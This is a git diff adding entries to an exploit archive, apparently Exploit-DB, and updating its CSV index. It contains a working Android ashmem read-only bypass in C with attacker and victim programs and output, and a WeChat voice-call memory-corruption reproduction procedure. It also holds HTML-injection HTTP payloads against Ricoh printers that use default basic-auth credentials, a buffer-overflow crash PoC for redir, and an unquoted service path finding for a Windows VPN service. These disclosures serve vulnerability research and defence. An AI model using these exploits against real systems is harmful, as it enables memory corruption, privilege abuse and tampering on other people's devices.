diff --git a/exploits/android/dos/47920.txt b/exploits/android/dos/47920.txt new file mode 100644 index 000000000..0945b6491 --- /dev/null +++ b/exploits/android/dos/47920.txt @@ -0,0 +1,24 @@ +There is a memory corruption vulnerability in audio processing during a voice call in WeChat. When an RTP packet is processed, there is a call to UnpacketRTP. This function decrements the length of the packet by 12 without checking that the packet has at least 12 bytes in it. This leads to a negative packet length. Then, CAudioJBM::InputAudioFrameToJBM will check that the packet size is smaller than the size of a buffer before calling memcpy, but this check (n < 300) does not consider that the packet length could be negative due to the previous error. This leads to an out-of-bounds copy. + +To reproduce the bug: + +1) install and run frida on the caller Android device and a desktop host (https://www.frida.re) +2) copy the filed in the attached directory to /data/local/tmp/packs/, so that /data/local/tmp/packs/opack0 exists +3) run "setenforce 0" on the caller device +4) extract replay.py and replay.js into the same directory on a desktop host and run: + +python3 replay.py DEVICENAME + +Wait for the word "READY" to display. + +If you don't know your device name, you can list device names by running: + +python3 replay.py + +5) start a voice call and answer it on the target device. A crash will occur in about 10 seconds. + +A crash log is attached. + + +Proof of Concept: +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47920.zip \ No newline at end of file diff --git a/exploits/android/dos/47921.txt b/exploits/android/dos/47921.txt new file mode 100644 index 000000000..2e0ed9487 --- /dev/null +++ b/exploits/android/dos/47921.txt @@ -0,0 +1,250 @@ +This bug report describes two ways in which an attacker can modify the contents +of a read-only ashmem fd. I'm not sure at this point what the most interesting +user of ashmem is in the current Android release, but there are various users, +including Chrome and a bunch of utility classes. +In AOSP master, there is even code in + +that uses ashmem for some JIT zygote mapping, which sounds extremely +interesting. + + +Android's ashmem kernel driver has an ->mmap() handler that attempts to lock +down created VMAs based on a configured protection mask such that in particular +write access to the underlying shmem file can never be gained. It tries to do +this as follows (code taken from upstream Linux +drivers/staging/android/ashmem.c): + + static inline vm_flags_t calc_vm_may_flags(unsigned long prot) + { + return _calc_vm_trans(prot, PROT_READ, VM_MAYREAD) | + _calc_vm_trans(prot, PROT_WRITE, VM_MAYWRITE) | + _calc_vm_trans(prot, PROT_EXEC, VM_MAYEXEC); + } + [...] + static int ashmem_mmap(struct file *file, struct vm_area_struct *vma) + { + struct ashmem_area *asma = file->private_data; + [...] + /* requested protection bits must match our allowed protection mask */ + if ((vma->vm_flags & ~calc_vm_prot_bits(asma->prot_mask, 0)) & + calc_vm_prot_bits(PROT_MASK, 0)) { + ret = -EPERM; + goto out; + } + vma->vm_flags &= ~calc_vm_may_flags(~asma->prot_mask); + [...] + if (vma->vm_file) + fput(vma->vm_file); + vma->vm_file = asma->file; + [...] + return ret; + } + +This ensures that the protection flags specified by the caller don't conflict +with the ->prot_mask, and it also clears the VM_MAY* flags as needed to prevent +the user from afterwards adding new protection flags via mprotect(). + +However, it improperly stores the backing shmem file, whose ->mmap() handler +does not enforce the same restrictions, in ->vm_file. An attacker can abuse this +through the remap_file_pages() syscall, which grabs the file pointer of an +existing VMA and calls its ->mmap() handler to create a new VMA. In effect, +calling remap_file_pages(addr, size, 0, 0, 0) on an ashmem mapping allows an +attacker to raise the VM_MAYWRITE bit, allowing the attacker to gain write +access to the ashmem allocation's backing file via mprotect(). + + +Reproducer (works both on Linux from upstream master in an X86 VM and on a +Pixel 2 at security patch level 2019-09-05 via adb): + +==================================================================== +user@vm:~/ashmem_remap$ cat ashmem_remap_victim.c +#include +#include +#include +#include +#include +#include +#include +#include + +#define __ASHMEMIOC 0x77 +#define ASHMEM_SET_SIZE _IOW(__ASHMEMIOC, 3, size_t) +#define ASHMEM_SET_PROT_MASK _IOW(__ASHMEMIOC, 5, unsigned long) + +int main(void) { + int ashmem_fd = open("/dev/ashmem", O_RDWR); + if (ashmem_fd == -1) + err(1, "open ashmem"); + if (ioctl(ashmem_fd, ASHMEM_SET_SIZE, 0x1000)) + err(1, "ASHMEM_SET_SIZE"); + char *mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, ashmem_fd, 0); + if (mapping == MAP_FAILED) + err(1, "mmap ashmem"); + if (ioctl(ashmem_fd, ASHMEM_SET_PROT_MASK, PROT_READ)) + err(1, "ASHMEM_SET_SIZE"); + mapping[0] = 'A'; + printf("mapping[0] = '%c'\n", mapping[0]); + + if (dup2(ashmem_fd, 42) != 42) + err(1, "dup2"); + pid_t child = fork(); + if (child == -1) + err(1, "fork"); + if (child == 0) { + execl("./ashmem_remap_attacker", "ashmem_remap_attacker", NULL); + err(1, "execl"); + } + int status; + if (wait(&status) != child) err(1, "wait"); + printf("mapping[0] = '%c'\n", mapping[0]); +}user@vm:~/ashmem_remap$ cat ashmem_remap_attacker.c +#define _GNU_SOURCE +#include +#include +#include +#include +#include + +int main(void) { + int ashmem_fd = 42; + + /* sanity check */ + char *write_mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, ashmem_fd, 0); + if (write_mapping == MAP_FAILED) { + perror("mmap ashmem writable failed as expected"); + } else { + errx(1, "trivial mmap ashmem writable worked???"); + } + + char *mapping = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, ashmem_fd, 0); + if (mapping == MAP_FAILED) + err(1, "mmap ashmem readonly failed"); + + if (mprotect(mapping, 0x1000, PROT_READ|PROT_WRITE) == 0) + errx(1, "mprotect ashmem writable worked???"); + + if (remap_file_pages(mapping, /*size=*/0x1000, /*prot=*/0, /*pgoff=*/0, /*flags=*/0)) + err(1, "remap_file_pages"); + + if (mprotect(mapping, 0x1000, PROT_READ|PROT_WRITE)) + err(1, "mprotect ashmem writable failed, attack didn't work"); + + mapping[0] = 'X'; + + puts("attacker exiting"); +}user@vm:~/ashmem_remap$ gcc -o ashmem_remap_victim ashmem_remap_victim.c +user@vm:~/ashmem_remap$ gcc -o ashmem_remap_attacker ashmem_remap_attacker.c +user@vm:~/ashmem_remap$ ./ashmem_remap_victim +mapping[0] = 'A' +mmap ashmem writable failed as expected: Operation not permitted +attacker exiting +mapping[0] = 'X' +user@vm:~/ashmem_remap$ +==================================================================== + +Interestingly, the (very much deprecated) syscall remap_file_pages() isn't even +listed in bionic's SYSCALLS.txt, which would normally cause it to be blocked by +Android's seccomp policy; however, SECCOMP_WHITELIST_APP.txt explicitly permits +it for 32-bit ARM applications: + + # b/36435222 + int remap_file_pages(void *addr, size_t size, int prot, size_t pgoff, int flags) arm,x86,mips + + + + +ashmem supports purgable memory via ASHMEM_UNPIN/ASHMEM_PIN. Unfortunately, +there is no access control for these - even if you only have read-only access to +an ashmem file, you can still mark pages in it as purgable, causing them to +effectively be zeroed out when the system is under memory pressure. Here's a +simple test for that (to be run in an X86 Linux VM): + +==================================================================== +user@vm:~/ashmem_purging$ cat ashmem_purge_victim.c +#include +#include +#include +#include +#include +#include +#include +#include + +#define __ASHMEMIOC 0x77 +#define ASHMEM_SET_SIZE _IOW(__ASHMEMIOC, 3, size_t) +#define ASHMEM_SET_PROT_MASK _IOW(__ASHMEMIOC, 5, unsigned long) + +int main(void) { + int ashmem_fd = open("/dev/ashmem", O_RDWR); + if (ashmem_fd == -1) + err(1, "open ashmem"); + if (ioctl(ashmem_fd, ASHMEM_SET_SIZE, 0x1000)) + err(1, "ASHMEM_SET_SIZE"); + char *mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, ashmem_fd, 0); + if (mapping == MAP_FAILED) + err(1, "mmap ashmem"); + if (ioctl(ashmem_fd, ASHMEM_SET_PROT_MASK, PROT_READ)) + err(1, "ASHMEM_SET_SIZE"); + mapping[0] = 'A'; + printf("mapping[0] = '%c'\n", mapping[0]); + + if (dup2(ashmem_fd, 42) != 42) + err(1, "dup2"); + pid_t child = fork(); + if (child == -1) + err(1, "fork"); + if (child == 0) { + execl("./ashmem_purge_attacker", "ashmem_purge_attacker", NULL); + err(1, "execl"); + } + int status; + if (wait(&status) != child) err(1, "wait"); + printf("mapping[0] = '%c'\n", mapping[0]); +} +user@vm:~/ashmem_purging$ cat ashmem_purge_attacker.c +#include +#include +#include +#include +#include +#include +#include + +struct ashmem_pin { + unsigned int offset, len; +}; + +#define __ASHMEMIOC 0x77 +#define ASHMEM_SET_SIZE _IOW(__ASHMEMIOC, 3, size_t) +#define ASHMEM_UNPIN _IOW(__ASHMEMIOC, 8, struct ashmem_pin) + +int main(void) { + struct ashmem_pin pin = { 0, 0 }; + if (ioctl(42, ASHMEM_UNPIN, &pin)) + err(1, "unpin 42"); + + /* ensure that shrinker doesn't get skipped */ + int ashmem_fd = open("/dev/ashmem", O_RDWR); + if (ashmem_fd == -1) + err(1, "open ashmem"); + if (ioctl(ashmem_fd, ASHMEM_SET_SIZE, 0x100000)) + err(1, "ASHMEM_SET_SIZE"); + char *mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, ashmem_fd, 0); + if (mapping == MAP_FAILED) + err(1, "mmap ashmem"); + if (ioctl(ashmem_fd, ASHMEM_UNPIN, &pin)) + err(1, "unpin 42"); + + /* simulate OOM */ + system("sudo sh -c 'echo 2 > /proc/sys/vm/drop_caches'"); + + puts("attacker exiting"); +} +user@vm:~/ashmem_purging$ gcc -o ashmem_purge_victim ashmem_purge_victim.c +user@vm:~/ashmem_purging$ gcc -o ashmem_purge_attacker ashmem_purge_attacker.c +user@vm:~/ashmem_purging$ ./ashmem_purge_victim +mapping[0] = 'A' +attacker exiting +mapping[0] = '' +user@vm:~/ashmem_purging$ +==================================================================== \ No newline at end of file diff --git a/exploits/hardware/webapps/47917.txt b/exploits/hardware/webapps/47917.txt new file mode 100644 index 000000000..d3b1cc4d5 --- /dev/null +++ b/exploits/hardware/webapps/47917.txt @@ -0,0 +1,37 @@ +# Exploit Title: IBM RICOH InfoPrint 6500 Printer - HTML Injection +# Date: 2020-01-02 +# Exploit Author: Ismail Tasdelen +# Vendor Homepage: https://www.ibm.com/il-en +# Hardware Link: http://www-01.ibm.com/common/ssi/cgi-bin/ssialias?infotype=AN&subtype=CA&htmlfid=897/ENUS105-214 +# Firmware Version: 1.4.40.10 +# Vulernability Type: Code Injection +# Vulenrability: HTML Injection +# CVE: N/A + +# Description : +# Ricoh InfoPrint 6500 devices allow /config?destConf.html +# HTML Injection by authenticated users, as demonstrated by the 166 parameter. + +HTTP Request : + +POST /config?destConf.html HTTP/1.1 +Host: SERVER +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 81 +Origin: SERVER +Authorization: Basic cm9vdDpyb290 +Connection: close +Referer: http://SERVER/config?destConf.html +Upgrade-Insecure-Requests: 1 + +166=%22%3E%3Ch1%3EIsmail+Tasdelen&182=1&230=1&198=1&190=1&222=1&238=1&270=0&486=0 + +HTTP Response : + +HTTP/1.0 200 OK +Server: Microplex emHTTPD/1.0 +Content-Type: text/html \ No newline at end of file diff --git a/exploits/hardware/webapps/47918.txt b/exploits/hardware/webapps/47918.txt new file mode 100644 index 000000000..68b449068 --- /dev/null +++ b/exploits/hardware/webapps/47918.txt @@ -0,0 +1,37 @@ +# Exploit Title: IBM RICOH 6400 Printer - HTML Injection +# Date: 2020-01-02 +# Exploit Author: Ismail Tasdelen +# Vendor Homepage: https://www.ibm.com/il-en +# Hardware Link: https://www-01.ibm.com/common/ssi/cgi-bin/ssialias?infotype=AN&subtype=CA&htmlfid=649/ENUSA02-1405&appname=USN +# Firmware Version: 1.1.26.3 +# Vulernability Type: Code Injection +# Vulenrability: HTML Injection +# CVE: N/A + +# Description : +# Ricoh InfoPrint 6400 devices allow /config?logpathConf.html +# HTML Injection by authenticated users, as demonstrated by the 420 parameter. + +HTTP Request : + +POST /config?logpathConf.html HTTP/1.1 +Host: SERVER +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 54 +Origin: SERVER +Authorization: Basic cm9vdDpyb290 +Connection: close +Referer: http://SERVER/config?logpathConf.html +Upgrade-Insecure-Requests: 1 + +428=&420=%22%3E%3Cmarquee%3EIsmail+Tasdelen&548=5&564= + +HTTP Response : + +HTTP/1.0 200 OK +Server: Microplex emHTTPD/1.0 +Content-Type: text/html \ No newline at end of file diff --git a/exploits/linux/dos/47919.txt b/exploits/linux/dos/47919.txt new file mode 100644 index 000000000..d357355d4 --- /dev/null +++ b/exploits/linux/dos/47919.txt @@ -0,0 +1,58 @@ +# Exploit Title: Redir 3.3 - Denial of Service (PoC) +# Date: 2020-01-14 +# Exploit Author: hieubl from HPT Cyber Security +# Vendor Homepage: https://github.com/troglobit/redir +# Software Link: https://github.com/troglobit/redir +# Version: 3.3 +# Tested on: Kali GNU/Linux Rolling 2019.4 +# CVE : [if applicable] + +The source code of redir.c contains doproxyconnect() function which +has the stack overflow vulnerability: + +void doproxyconnect(int socket) +{ + int x; + char buf[128]; + + /* write CONNECT string to proxy */ + sprintf((char *)&buf, "CONNECT %s HTTP/1.0\n\n", connect_str); + x = write(socket, (char *)&buf, strlen(buf)); + if (x < 1) { + syslog(LOG_ERR, "Failed writing to proxy: %s", strerror(errno)); + exit(1); + } + /* now read result */ + x = read(socket, (char *)&buf, sizeof(buf)); + if (x < 1) { + syslog(LOG_ERR, "Failed reading reply from proxy: %s", strerror(errno)); + exit(1); + } + /* no more error checking for now -- something should be added later */ + /* HTTP/1.0 200 Connection established */ +} + +Download and build: +# git clone https://github.com/troglobit/redir.git +# cd redir +# ./autogen.sh +# ./configure +# make + +Proof of Concept: + In 1st terminal: + # gdb -q ./redir + # set follow-fork-mode child + # r -x AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +:1234 hpt.vn:80 + + In 2nd terminal: + # nc localhost 1234 + + After that, the program in 1st terminal will crash because of buffer +overflow vulnerability. + ... + ► 0x5555555571b0 ret <0x4141414141414141> + ... + Program received signal SIGSEGV (fault address 0x0) + pwndbg> \ No newline at end of file diff --git a/exploits/windows/local/47916.txt b/exploits/windows/local/47916.txt new file mode 100644 index 000000000..e2e3bb8fc --- /dev/null +++ b/exploits/windows/local/47916.txt @@ -0,0 +1,21 @@ +# Exploit Title: VPN unlimited 6.1 - Unquoted Service Path +# Date: 2020-1-13 +# Exploit Author: Amin Rawah +# Vendor Homepage: https://www.vpnunlimitedapp.com +# Version: 6.1 +# Tested on: Windows 10 64bit + +C:\Users\Amin>sc qc VPNUnlimitedService +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: VPNUnlimitedService + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\VPN +Unlimited\vpn-unlimited-daemon.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : VPN Unlimited Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index df2936c89..b68b21f9d 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6654,6 +6654,9 @@ id,file,description,date,author,type,platform,port 47909,exploits/windows/dos/47909.py,"Backup Key Recovery 2.2.5 - 'Name' Denial of Service (PoC)",2020-01-13,"Ismail Tasdelen",dos,windows, 47911,exploits/windows/dos/47911.py,"TaskCanvas 1.4.0 - 'Registration' Denial Of Service",2020-01-13,"Ismail Tasdelen",dos,windows, 47912,exploits/windows/dos/47912.py,"Top Password Firefox Password Recovery 2.8 - Denial of Service (PoC)",2020-01-13,antonio,dos,windows, +47919,exploits/linux/dos/47919.txt,"Redir 3.3 - Denial of Service (PoC)",2020-01-14,hieubl,dos,linux, +47920,exploits/android/dos/47920.txt,"WeChat - Memory Corruption in CAudioJBM::InputAudioFrameToJBM",2020-01-14,"Google Security Research",dos,android, +47921,exploits/android/dos/47921.txt,"Android - ashmem Readonly Bypasses via remap_file_pages() and ASHMEM_UNPIN",2020-01-14,"Google Security Research",dos,android, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -10898,6 +10901,7 @@ id,file,description,date,author,type,platform,port 47908,exploits/windows/local/47908.py,"Allok Video Converter 4.6.1217 - Stack Overflow (SEH)",2020-01-13,antonio,local,windows, 47910,exploits/windows/local/47910.py,"Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 - Stack Overflow (SEH)",2020-01-13,antonio,local,windows, 47915,exploits/windows/local/47915.py,"Microsoft Windows 10 build 1809 - Local Privilege Escalation (UAC Bypass)",2020-01-13,"Nassim Asrir",local,windows, +47916,exploits/windows/local/47916.txt,"VPN unlimited 6.1 - Unquoted Service Path",2020-01-14,"Amin Rawah",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -42216,3 +42220,5 @@ id,file,description,date,author,type,platform,port 47903,exploits/php/webapps/47903.py,"Chevereto 3.13.4 Core - Remote Code Execution",2020-01-13,"Jinny Ramsmark",webapps,php, 47913,exploits/multiple/webapps/47913.rb,"Citrix Application Delivery Controller and Gateway 10.5 - Remote Code Execution (Metasploit)",2020-01-13,mekhalleh,webapps,multiple, 47914,exploits/php/webapps/47914.txt,"Digi AnywhereUSB 14 - Reflective Cross-Site Scripting",2020-01-13,"Raspina Net Pars Group",webapps,php, +47917,exploits/hardware/webapps/47917.txt,"IBM RICOH InfoPrint 6500 Printer - HTML Injection",2020-01-14,"Ismail Tasdelen",webapps,hardware, +47918,exploits/hardware/webapps/47918.txt,"IBM RICOH 6400 Printer - HTML Injection",2020-01-14,"Ismail Tasdelen",webapps,hardware,